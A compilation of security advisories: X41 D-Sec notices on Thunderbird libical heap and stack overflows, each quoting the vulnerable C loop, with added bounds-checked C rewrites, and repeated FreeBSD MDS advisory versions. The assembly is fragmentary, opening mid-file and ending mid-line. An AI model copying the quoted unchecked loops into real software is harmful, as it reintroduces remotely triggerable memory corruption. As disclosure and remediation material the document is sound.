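enum prop_kind { PROP_NONE, PROP_STRING, PROP_FLOAT };

struct prop_value {
    enum prop_kind kind;          /* discriminant: which union member is live */
    union {
        char *str;                /* valid only when kind == PROP_STRING */
        float f;                  /* valid only when kind == PROP_FLOAT  */
    } u;
};

/* malloc'd copy of s (avoids relying on the POSIX strdup declaration) */
static char *dup_string(const char *s)
{
    size_t n = strlen(s) + 1;
    char *out = malloc(n);
    if (out != NULL)
        memcpy(out, s, n);
    return out;
}

/* Parse "NAME[;VALUE=FLOAT]:value" (constructed syntax modelled on the
 * iCalendar VALUE parameter).  Returns 0 on success, -1 on a malformed line. */
static int prop_value_parse(const char *line, struct prop_value *out)
{
    const char *colon = strchr(line, ':');
    const char *marker = strstr(line, ";VALUE=FLOAT");

    if (colon == NULL)
        return -1;
    memset(out, 0, sizeof(*out));
    if (marker != NULL && marker < colon) {      /* parameter precedes the value */
        out->kind = PROP_FLOAT;
        out->u.f = strtof(colon + 1, NULL);
    } else {
        out->kind = PROP_STRING;
        out->u.str = dup_string(colon + 1);
        if (out->u.str == NULL)
            return -1;
    }
    return 0;
}

/* Checked accessor: NULL unless the value really holds a string. */
static const char *prop_value_as_string(const struct prop_value *v)
{
    if (v == NULL || v->kind != PROP_STRING)
        return NULL;
    return v->u.str;
}

static void prop_value_free(struct prop_value *v)
{
    if (v->kind == PROP_STRING)
        free(v->u.str);
    v->kind = PROP_NONE;
}

/* Consumer side of the TZID lookup.  Returns 1 and a malloc'd copy of the
 * TZID when the value is a string, 0 (with *tzid_out = NULL) when the value
 * has the wrong kind, -1 when the line does not parse. */
int tzid_from_line(const char *line, char **tzid_out)
{
    struct prop_value v;
    const char *s;

    *tzid_out = NULL;
    if (prop_value_parse(line, &v) != 0)
        return -1;
    s = prop_value_as_string(&v);
    if (s != NULL)
        *tzid_out = dup_string(s);   /* only reached for a genuine string */
    prop_value_free(&v);
    return *tzid_out != NULL;
}

int main(void)
{
    /* constructed sample property lines */
    const char *lines[] = { "TZID:Europe/Berlin", "TZID;VALUE=FLOAT:3.5" };
    for (size_t i = 0; i < 2; i++) {
        char *tzid;
        int rc = tzid_from_line(lines[i], &tzid);
        printf("%-24s -> rc=%d tzid=%s\n", lines[i], rc, tzid ? tzid : "(rejected)");
        free(tzid);
    }
    return 0;
}
```

The float-typed line is rejected at the accessor rather than reaching the copy, which is the point at which the advisory's strdup(tzid) would otherwise have dereferenced a float reinterpreted as a pointer.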
X41 D-Sec GmbH Security Advisory X41-2019-003: Stack-based buffer overflow in Thunderbird
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-003

Stack-based buffer overflow in Thunderbird
==========================================

Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553808
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11705
CWE: 121
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-003-thunderbird

Summary and Impact
==================

A stack-based buffer overflow has been identified in the Thunderbird email
client. The issue is present in the libical implementation, which was forked
from upstream libical version 0.47. The issue can be triggered remotely, when
an attacker sends a specially crafted calendar attachment, and does not
require user interaction. It might be used by a remote attacker to crash the
client or gain remote code execution on the client system.

X41 did not perform a full test or audit on the software.

Product Description
===================

Thunderbird is a free and open source email, newsfeed, chat, and calendaring
client that is easy to set up and customize.

Analysis
========

A stack-based buffer overflow in icalrecur.c icalrecur_add_bydayrules() can
be triggered while parsing a calendar attachment containing a malformed or
specially crafted string.

~~~
static int icalrecur_add_bydayrules(struct icalrecur_parser *parser, const char *vals)
{
    short *array = parser->rt.by_day;
    // ...
    while (n != 0) {
        // ...
        if (wd != ICAL_NO_WEEKDAY) {
            array[i++] = (short) (sign * (wd + 8 * weekno));
            array[i] = ICAL_RECURRENCE_ARRAY_MAX;
        }
    }
~~~

Missing sanity checks in `icalrecur_add_bydayrules()` can lead to an out of
bounds write in `array` when `weekno` takes an invalid value.

The issue manifests as an out-of-bounds write to a stack-allocated buffer. It
is expected that an attacker can exploit this vulnerability to achieve remote
code execution when proper stack smashing mitigations are missing.

Proof of Concept
================

A reproducer eml file can be found in
https://github.com/x41sec/advisories/tree/master/X41-2019-003

Workarounds
===========

A fix is available from upstream. Alternatively, libical can be replaced by
icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in the Thunderbird configuration.

Timeline
========

2019-05-23 Issues reported to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH
====================

X41 is an expert provider for application security services. Having
extensive industry experience and expertise in the area of information
security, a strong core security team of world class security experts
enables X41 to perform premium security services.

Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery. Custom research and IT security consulting and support services
are core competencies of X41.
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtJsACgkQo5Klpg50 CxALNg//RiEGsoszNtnBzS/tvL5UIniG6oBXHaqu+9XZUJeM+tYzs4Z3JvvHWx1y exGt3nM3PMXgw21lr8NumJGHibMDckIrOIpetphg9GqRfk/iS4NivcHcbhSq7sNz NajGpulM6HtgDflFgpB1GKfekE/DJlbiULq5SBgv/bARRARGGgGNtWp863sQPKG+ rvjSOnTyQw1ypYjozMYrmUasgC4jsLmB0LUIWqHy6lEN5OWehnO9pOpiV8xTA0qc Y9C0IDkf6YGH6xwOxaUXc9HXGBOiQATexNGOtOmWoUsg7cpRdnuoo8YOP9V+kbeX OK301LlXUtt0th5zu6tVGo4WK75sI8gmpxUtcbIyCxTzRC7fqAlbHGaKlQURZ23s /2Tv5pzpBBjIO4T2t8v1O/10pDyfH2zUCXik3il2GY+zpNprR1Va6asB4y3nEPl1 ghLYCjHt58CZJZILMmK/lZap6I3ea9UaW3TsZuC07zv8A9bf+I6xcgA0+4Ms6e0P 1d1T/ygVluKRay5fgiiubTYAqtngFTOXMCioj/JmeDvL+wTYpwduukhZxDuGT6P/ OV0MuvDW1RQpj2hsw+dbcVnE+Y7X/WZDVbq3ByOj5VQz/mTPkcGaJVh37kI9Sp6A YFJYuJrFqmdMFh365aUmAOp26hYdY9++wwWAqAlYAVFjLXst5is= =E1se
-----END PGP SIGNATURE-----
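The excerpt in X41-2019-003 writes `array[i++]` and the terminator without checking `i` against the array size or `weekno` against its valid range. As an added example (not the advisory's, libical's or Thunderbird's code), here is a bounded version of the same BYDAY fill loop in C: it parses a comma-separated BYDAY list, rejects week numbers outside the RFC 5545 range of 1..53 (with optional sign), and refuses any entry that would not leave room for the terminator slot. The names byday_fill, weekday_code, BYDAY_SIZE, NO_WEEKDAY and ARRAY_MAX are hypothetical stand-ins for the libical identifiers in the excerpt.

```c
/* Added example, not code from X41, libical or Thunderbird.  BYDAY_SIZE,
 * ARRAY_MAX, NO_WEEKDAY, weekday_code and byday_fill are hypothetical
 * stand-ins for the libical names in the advisory's excerpt. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BYDAY_SIZE  8        /* constructed: slots in the destination array   */
#define ARRAY_MAX   0x7f7f   /* constructed terminator, like ICAL_RECURRENCE_ARRAY_MAX */
#define NO_WEEKDAY  0

/* Map "SU".."SA" to 1..7, anything else to NO_WEEKDAY. */
static int weekday_code(const char *s)
{
    static const char *names[] = { "SU", "MO", "TU", "WE", "TH", "FR", "SA" };
    for (int i = 0; i < 7; i++)
        if (strncmp(s, names[i], 2) == 0)
            return i + 1;
    return NO_WEEKDAY;
}

/* Parse a BYDAY value list such as "MO,-1FR,+2TU" into array, which has
 * n_slots entries including the terminator slot.  Encoding matches the
 * excerpt: sign * (weekday + 8 * weekno).  Returns the number of entries
 * stored, or -1 when the input would overflow the array, a week number is
 * out of range, or a token is not a weekday. */
int byday_fill(const char *vals, short *array, size_t n_slots)
{
    size_t i = 0;
    const char *p = vals;

    if (n_slots == 0)
        return -1;
    while (*p != '\0') {
        int sign = 1;
        long weekno = 0;
        int wd;

        if (*p == '+' || *p == '-') {
            if (*p == '-')
                sign = -1;
            p++;
        }
        if (isdigit((unsigned char)*p)) {
            char *end;
            weekno = strtol(p, &end, 10);
            if (weekno < 1 || weekno > 53)       /* reject invalid week numbers */
                return -1;
            p = end;
        }
        wd = weekday_code(p);
        if (wd == NO_WEEKDAY)                    /* unknown weekday token */
            return -1;
        p += 2;
        if (i + 1 >= n_slots)                    /* keep one slot for the terminator */
            return -1;
        array[i++] = (short)(sign * (wd + 8 * weekno));
        if (*p == ',')
            p++;
        else if (*p != '\0')
            return -1;                           /* trailing garbage */
    }
    array[i] = ARRAY_MAX;
    return (int)i;
}

int main(void)
{
    /* constructed sample inputs: a valid list and one that would overflow */
    const char *samples[] = { "MO,-1FR,+2TU", "MO,TU,WE,TH,FR,SA,SU,MO", "1000MO" };
    for (size_t s = 0; s < 3; s++) {
        short arr[BYDAY_SIZE];
        int n = byday_fill(samples[s], arr, BYDAY_SIZE);
        printf("%-26s -> %d\n", samples[s], n);
    }
    return 0;
}
```

The two checks added here, on `weekno` and on `i`, are exactly the "sanity checks" the advisory says were missing; everything else follows the encoding of the original loop.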
X41 D-Sec GmbH Security Advisory X41-2019-002: Heap-based buffer overflow in Thunderbird
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-002

Heap-based buffer overflow in Thunderbird
=========================================

Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553820
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11703
CWE: 122
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird

Summary and Impact
==================

A heap-based buffer overflow has been identified in the Thunderbird email
client. The issue is present in the libical implementation, which was forked
from upstream libical version 0.47. The issue can be triggered remotely, when
an attacker sends a specially crafted calendar attachment, and does not
require user interaction. It might be used by a remote attacker to crash the
client or gain remote code execution on the client system.

This issue was initially reported by Brandon Perry here:
https://bugzilla.mozilla.org/show_bug.cgi?id=1281041
and fixed in libical upstream, but was never fixed in Thunderbird.

X41 did not perform a full test or audit on the software.

Product Description
===================

Thunderbird is a free and open source email, newsfeed, chat, and calendaring
client that is easy to set up and customize.

Analysis
========

A heap-based buffer overflow in icalparser.c parser_get_next_char() can be
triggered while parsing a calendar attachment containing a malformed or
specially crafted string.

The issue initially manifests as an out of bounds read, but we do not rule
out that it could later lead to an out of bounds write. It is expected that
an attacker can exploit this vulnerability to achieve remote code execution.

Proof of Concept
================

A reproducer ical file can be found in
https://github.com/x41sec/advisories/tree/master/X41-2019-002

Workarounds
===========

A fix is available from upstream. Alternatively, libical can be replaced by
icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in the Thunderbird configuration.

Timeline
========

2016-06-20 Issue reported by Brandon Perry to the vendor
2019-05-23 Issues reported to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH
====================

X41 is an expert provider for application security services. Having
extensive industry experience and expertise in the area of information
security, a strong core security team of world class security experts
enables X41 to perform premium security services.

Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery. Custom research and IT security consulting and support services
are core competencies of X41.

-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtHsACgkQo5Klpg50 CxD5DRAAnruhd0PEjQV3ELUiM/9PHe5hC8rpWLqPNcuDY/dbPvg4w1qOAoXops9e d3hJlMM2zaUeAv5MZGgxT7FIO116IFafALMjMssIC9zw3yM9oKF4s1amL/GzF+P9 vMamD3A5t5j2mHYuWFaDe+bcHak8QfmVgSRqKNvNp/rF27oWE3SgCraYFP1+RlpR s0qbFcjLdo9SBqvpbSt3cbolrIOiS2nXER1cthmd2Ig7ga3oElEfWKZ19d+twBxx oKqtS607p9ASfql29HDwC0VtgQPx1ySRBestYDtjsD2d97bAaAhA2/Kkpx6A/H91 EbiSyKByO3vs+nQzTdkI/xNN9edBly6se3WKaDBIfZOzWCsXwcUtUKpnAw5YMf/n BoaDzv/D70Sk3GfXOD9qb2bMNFCEQdeZh3O1Tmmzi3kXa9kQJfdIDdjfeeDd7h87 r6vtYeHA7mVM2BGteO5FHQhooJVSi+gcGg9esj5656YznRS9zbc7KgkWJiItwMhj hiBL7r8v2M0Gzx4qhhCg+gxl+ikBaYCgZh9WGi4fsekwufwEnnCnQxN52ZE9vBia BJJGpPbGkVaxDCJXOfQDvJiovbG4ekK54tavqLBXaH/KuucMFGaE95gPSKnxn8LD 0QwpeLzad2bSiolSHux5RBR/t5d4znzjce/qxIpRQdWcgu9kzTs= =1OOu
-----END PGP SIGNATURE-----
X41 D-Sec GmbH Security Advisory X41-2019-001: Heap-based buffer overflow in Thunderbird
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-001

Heap-based buffer overflow in Thunderbird
=========================================

Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11704
CWE: 122
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird

Summary and Impact
==================

A heap-based buffer overflow has been identified in the Thunderbird email
client. The issue is present in the libical implementation, which was forked
from upstream libical version 0.47. The issue can be triggered remotely, when
an attacker sends a specially crafted calendar attachment, and does not
require user interaction. It might be used by a remote attacker to crash the
client or gain remote code execution on the client system.

This issue was initially reported by Brandon Perry here:
https://bugzilla.mozilla.org/show_bug.cgi?id=1280832
and fixed in libical upstream, but was never fixed in Thunderbird.

X41 did not perform a full test or audit on the software.

Product Description
===================

Thunderbird is a free and open source email, newsfeed, chat, and calendaring
client that is easy to set up and customize.

Analysis
========

A heap-based buffer overflow in icalvalue.c icalmemory_strdup_and_dequote()
can be triggered while parsing a calendar attachment containing a malformed
or specially crafted string.

~~~
static char *icalmemory_strdup_and_dequote(const char *str)
{
    char *out = (char *)malloc(sizeof(char) * strlen(str) + 1);
    char *pout = out;
    // ...
    for (p = str; *p != 0; p++) {
        if (*p == '\\') {
            p++;
            // ...
        } else {
            *pout = *p;
        }
    }
~~~

Bounds checking in `icalmemory_strdup_and_dequote()` can be bypassed when the
input `p` ends with a backslash, which enables an attacker to read out of
bounds of the input buffer and write out of bounds of a heap-allocated output
buffer.

The issue manifests in several ways, including out of bounds read and write
and null-pointer dereference, and frequently leads to heap corruption. It is
expected that an attacker can exploit this vulnerability to achieve remote
code execution.

Proof of Concept
================

A reproducer EML file can be found in:
https://github.com/x41sec/advisories/tree/master/X41-2019-001

Workarounds
===========

A fix is available from upstream. Alternatively, libical can be replaced by
icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in the Thunderbird configuration.

Timeline
========

2016-06-19 Issue reported by Brandon Perry to the vendor
2019-05-23 Issue reported by X41 D-SEC to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH
====================

X41 is an expert provider for application security services. Having
extensive industry experience and expertise in the area of information
security, a strong core security team of world class security experts
enables X41 to perform premium security services.

Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery. Custom research and IT security consulting and support services
are core competencies of X41.
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtFQACgkQo5Klpg50 CxDziQ/+JVKmkCHu3UXeNTrf3nFAcg3pzopaADVMK4yo7P/iQW/HMtvlz3sbi/ND 8nkTzXjPwTXmPZqrcr8X28lsffx2wu4ehIZNp2izTkfQkbIeA0co1bM2KhGJU+p+ GQP8yGsVi00+UvQfd5KxB4ydc7/Q4nTFH325yx7D4OHW/rDuETt5p8h1h7zmFBW+ SV09t4qQQx8HeWj2pQS6wF6pWo80/nqJbS8f540PQ+XTysvYsflxiybAqYK2mW2j QzvjT/YosR39JCMHBKscptwVgJFT6b2DsSq+Lt+1BTn0Ef0XoIY/rMvLFX1ww8HK nsViFPjtyhkX7CftIjZK6y4oK4nKsgyDiOieNKodfkr1jTmipUIIjwtGM99pKcv2 wNDY4ySB7RSbW+W+yrWc75vEX+Ev1enXkeM6xcJiPO0CiWfceZpVzZVcjoFqt9H6 57Uy10OMzZDi3reIMsMs3SxpRyXQqcyjlPkk7PlkzHx2XjAMKqwW6t5QZwMpIHrm M4BQOzxz9UuhnfZI80ZmJhYCh9zOOdjmJXGxOp5cB1GSXjQQ7PH/0aqTbfI0Hp+b uxqXsxBJ0YTO0qhHluuPkInqLEKlewHvNT4P5YE7US3TNCHPuei7P3zTq7fqSPjW sgj9XXjf4cbB7N+txXnq55BpHemGKAd4spgvQvo0L35m2RribBs= =sYWR
-----END PGP SIGNATURE-----
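The excerpt in X41-2019-001 advances `p` past a backslash without first checking that another character follows, so a value ending in a backslash steps over the terminating NUL. As an added example (not the advisory's, libical's or Thunderbird's code), here is a dequote routine in C that looks ahead before consuming the escape: a backslash in the last position is copied literally, the read pointer never passes the NUL, and because every escape shrinks or preserves the length the `strlen(str) + 1` allocation is always sufficient. The names dequote_copy and unescape are hypothetical, and the escape table is a constructed subset of the iCalendar text escapes.

```c
/* Added example, not code from X41, libical or Thunderbird.  dequote_copy
 * and unescape are hypothetical names; the escape table is a constructed
 * subset of iCalendar TEXT escapes. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Translate the character following a backslash; unknown escapes are
 * copied literally (so "\\;" -> ';', "\\\\" -> '\\'). */
static char unescape(char c)
{
    switch (c) {
    case 'n': case 'N': return '\n';
    case 't': case 'T': return '\t';
    default:            return c;
    }
}

/* Return a freshly allocated, dequoted copy of str, or NULL on allocation
 * failure.  Output length never exceeds input length, so strlen(str) + 1
 * bytes always suffice.  A trailing backslash is copied as-is instead of
 * being consumed, which is the check the vulnerable excerpt lacked. */
char *dequote_copy(const char *str)
{
    size_t n = strlen(str);
    char *out = malloc(n + 1);
    char *pout;

    if (out == NULL)
        return NULL;
    pout = out;
    for (const char *p = str; *p != '\0'; p++) {
        if (*p == '\\' && p[1] != '\0') {   /* look ahead before stepping over the escape */
            p++;
            *pout++ = unescape(*p);
        } else {
            *pout++ = *p;                   /* ordinary char, or a lone trailing backslash */
        }
    }
    *pout = '\0';
    return out;
}

int main(void)
{
    /* constructed inputs, including the trailing-backslash edge case */
    const char *samples[] = { "a\\;b\\nc", "ends with backslash\\", "\\" };
    for (size_t i = 0; i < 3; i++) {
        char *s = dequote_copy(samples[i]);
        if (s == NULL)
            return 1;
        printf("%-22s -> [%s] (%zu bytes)\n", samples[i], s, strlen(s));
        free(s);
    }
    return 0;
}
```

The single look-ahead `p[1] != '\0'` is what keeps the loop condition `*p != '\0'` meaningful; without it the increment inside the branch skips the NUL and the following `p++` in the loop header reads past the end of the input.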
FreeBSD Security Advisory FreeBSD-SA-19:07.mds [REVISED]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:07.mds                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Microarchitectural Data Sampling (MDS)

Category:       core
Module:         kernel
Announced:      2019-05-14
Credits:        Refer to Intel's security advisory at the URL below for
                detailed acknowledgements.
Affects:        All supported versions of FreeBSD.
Corrected:      2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE)
                2019-05-14 23:19:08 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2018-12126, CVE-2018-12127, CVE-2018-12130,
                CVE-2019-11091

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

0.   Revision history

v1.0  2019-05-14  Initial release.
v1.1  2019-05-15  Fixed date on microcode update package.
v1.2  2019-05-15  Userland startup microcode update details added.
                  Add language specifying which manufacturers are affected.

I.   Background

Modern processors make use of speculative execution, an optimization
technique which performs some action in advance of knowing whether the
result will actually be used.

II.  Problem Description

On some Intel processors utilizing speculative execution a local process
may be able to infer stale information from microarchitectural buffers to
obtain a memory disclosure.

III. Impact

An attacker may be able to read secret data from the kernel or from a
process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available.

Only Intel x86 based processors are affected. x86 processors from other
manufacturers (e.g., AMD) are not believed to be vulnerable.

Systems with users or processors in different trust domains should disable
Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0:

# echo 'machdep.hyperthreading_allowed=0' >> /boot/loader.conf
# shutdown -r +10min "Security update"

V.   Solution

Perform one of the following:

Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD
stable or release / security branch (releng) dated after the correction
date, evaluate mitigation and Hyper Threading controls, and reboot the
system.

New CPU microcode may be available in a BIOS update from your system vendor,
or by installing the devcpu-data package or sysutils/devcpu-data port.
Ensure that the BIOS update or devcpu-data package is dated after
2019-05-14.

If using the package or port, the Intel microcode update can be applied at
boot time (only on FreeBSD 12 and later) by adding the following lines to
the system's /boot/loader.conf:

cpu_microcode_load="YES"
cpu_microcode_name="/boot/firmware/intel-ucode.bin"

To automatically load microcode during userland startup (supported on all
FreeBSD versions), add the following to /etc/rc.conf:

microcode_update_enable="YES"

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Follow additional details under "Mitigation Configuration" below.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0-STABLE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc
# gpg --verify mds.12-stable.patch.asc

[FreeBSD 12.0-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc
# gpg --verify mds.12.0.patch.asc

[FreeBSD 11.3-PRERELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch.asc
# gpg --verify mds.11-stable.patch.asc

[FreeBSD 11.2-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch.asc
# gpg --verify mds.11.2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html>.

Mitigation
FreeBSD Security Advisory FreeBSD-SA-19:07.mds
=============================================================================
FreeBSD-SA-19:07.mds                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Microarchitectural Data Sampling (MDS)

Category:       core
Module:         kernel
Announced:      2019-05-14
Credits:        Refer to Intel's security advisory at the URL below for
                detailed acknowledgements.
Affects:        All supported versions of FreeBSD.
Corrected:      2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE)
                2019-05-15 13:44:27 UTC (releng/12.0, 12.0-RELEASE-p5)
                2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2018-12126, CVE-2018-12127, CVE-2018-12130,
                CVE-2019-11091

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

0.   Revision history

v1.0  2019-05-14  Initial release.
v1.1  2019-05-15  Fixed date on microcode update package.
v1.2  2019-05-15  Userland startup microcode update details added.
                  Add language specifying which manufacturers are affected.
v1.3  2019-05-15  Minor quoting nit for the HT disable loader config.
v2.0  2019-05-15  Rerelease 12.0-RELEASE patch as -p5 due to i386 panic bug.

I.   Background

Modern processors make use of speculative execution, an optimization
technique which performs some action in advance of knowing whether the
result will actually be used.

II.  Problem Description

On some Intel processors utilizing speculative execution a local process
may be able to infer stale information from microarchitectural buffers to
obtain a memory disclosure.

III. Impact

An attacker may be able to read secret data from the kernel or from a
process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available.

Only Intel x86 based processors are affected.  x86 processors from other
manufacturers (e.g., AMD) are not believed to be vulnerable.

Systems with users or processors in different trust domains should disable
Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0:

# echo 'machdep.hyperthreading_allowed=0' >> /boot/loader.conf
# shutdown -r +10min "Security update"

V.   Solution

Perform one of the following:

Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD
stable or release / security branch (releng) dated after the correction
date, evaluate mitigation and Hyper Threading controls, and reboot the
system.

New CPU microcode may be available in a BIOS update from your system vendor,
or by installing the devcpu-data package or sysutils/devcpu-data port.
Ensure that the BIOS update or devcpu-data package is dated after
2019-05-14.

If using the package or port the Intel microcode update can be applied at
boot time (only on FreeBSD 12 and later) by adding the following lines to
the system's /boot/loader.conf:

cpu_microcode_load="YES"
cpu_microcode_name="/boot/firmware/intel-ucode.bin"

To automatically load microcode during userland startup (supported on all
FreeBSD versions), add the following to /etc/rc.conf:

microcode_update_enable="YES"

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Follow additional details under "Mitigation Configuration" below.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[*** v2.0 NOTE *** Only applies to 12.0-RELEASE ***]
Due to an error in the 12.0-RELEASE affecting the i386 architecture, a
new set of patches is being released.

If your 12.0-RELEASE sources are not yet patched using the initially
published patch, then you need to apply the mds.12.0.patch.  If your
sources are already updated, or patched with the patch from the initial
advisory, then you need to apply the incremental patch, named
mds.12.0.p4p5.patch

[FreeBSD 12.0-STABLE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc
# gpg --verify mds.12-stable.patch.asc

[FreeBSD 12.0-RELEASE, not patched with initial SA-19:07.mds patch]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc
# gpg --verify mds.12.
FreeBSD Security Advisory FreeBSD-SA-19:07.mds
=============================================================================
FreeBSD-SA-19:07.mds                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Microarchitectural Data Sampling (MDS)

Category:       core
Module:         kernel
Announced:      2019-05-14
Credits:        Refer to Intel's security advisory at the URL below for
                detailed acknowledgements.
Affects:        All supported versions of FreeBSD.
Corrected:      2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE)
                2019-05-14 23:19:08 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2018-12126, CVE-2018-12127, CVE-2018-12130,
                CVE-2019-11091

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

Modern processors make use of speculative execution, an optimization
technique which performs some action in advance of knowing whether the
result will actually be used.

II.  Problem Description

On some Intel processors utilizing speculative execution a local process
may be able to infer stale information from microarchitectural buffers to
obtain a memory disclosure.

III. Impact

An attacker may be able to read secret data from the kernel or from a
process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available.

Systems with users or processors in different trust domains should disable
Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0:

# echo 'machdep.hyperthreading_allowed=0' >> /boot/loader.conf
# shutdown

V.   Solution

Perform one of the following:

Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD
stable or release / security branch (releng) dated after the correction
date, evaluate mitigation and Hyper Threading controls, and reboot the
system.

New CPU microcode may be available in a BIOS update from your system vendor,
or by installing the devcpu-data package or sysutils/devcpu-data port.
Ensure that the BIOS update or devcpu-data package is dated after
2019-05-14.

If using the package or port the microcode update can be applied at boot
time by adding the following lines to the system's /boot/loader.conf:

